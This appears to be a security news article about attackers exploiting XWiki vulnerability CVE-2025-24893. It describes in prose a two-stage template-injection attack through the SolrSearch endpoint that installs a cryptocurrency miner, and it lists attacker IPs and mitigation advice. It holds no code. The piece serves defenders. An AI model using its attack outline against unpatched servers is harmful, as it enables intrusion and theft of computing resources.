A critical security vulnerability in XWiki collaboration software is being actively exploited by threat actors to deploy cryptocurrency mining malware on vulnerable systems.
The flaw, tracked as CVE-2025-24893, represents a serious threat to organizations running unpatched XWiki installations.
Cybersecurity researchers at VulnCheck have captured concrete evidence of active exploitation through their canary network.
| CVE Details | Information |
| CVE ID | CVE-2025-24893 |
| Vulnerability Type | Unauthenticated Remote Template Injection |
| Affected Product | XWiki |
| Severity | Critical |
The attacks originate from Vietnam-based threat actors who employ a sophisticated two-stage attack methodology.
The initial exploitation occurs through XWiki’s SolrSearch endpoint, where attackers inject malicious code via a template injection vulnerability that requires no authentication.
The attack begins when hackers send a crafted request to the vulnerable endpoint, using URL-encoded parameters to execute remote commands.
The first stage downloads a small bash script from a command-and-control server located at IP address 193.32.208.24, which hosts malicious payloads through a transfer.sh instance.
This downloader is saved to the /tmp directory on compromised systems. After approximately 20 minutes, attackers return with a second request that executes the staged downloader, initiating the full infection chain.
The downloaded script immediately fetches two additional payloads that work together to establish persistence and deploy the mining operation.
One script installs a cryptocurrency miner called tcrond in a hidden directory, while the second script terminates competing miners and launches the malicious mining software configured to connect with c3pool.org mining pools.
Despite confirmed exploitation in the wild, CVE-2025-24893 notably does not appear on CISA’s Known Exploited Vulnerabilities catalog, highlighting a concerning gap between real-world attacks and official recognition.
VulnCheck added the vulnerability to their own KEV database in March 2025 after multiple security organizations including Cyble, Shadow Server, and CrowdSec reported exploitation attempts.
The mining malware deployed in these attacks is UPX-packed to evade detection and employs several anti-analysis techniques.
Once activated, the miner attempts to kill other cryptocurrency mining processes on the system, removes command history, and disables bash history logging to cover its tracks.
Security researchers identified the primary attack infrastructure at IP address 123.25.249.88, which has multiple reports on AbuseIPDB for malicious activity.
Organizations running XWiki should immediately update to patched versions and monitor their systems for indicators of compromise.
Network administrators should block communication with the identified malicious IP addresses and search for the specific file hashes associated with this campaign.
The vulnerability’s remote nature and lack of authentication requirements make it particularly dangerous for internet-facing XWiki installations.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
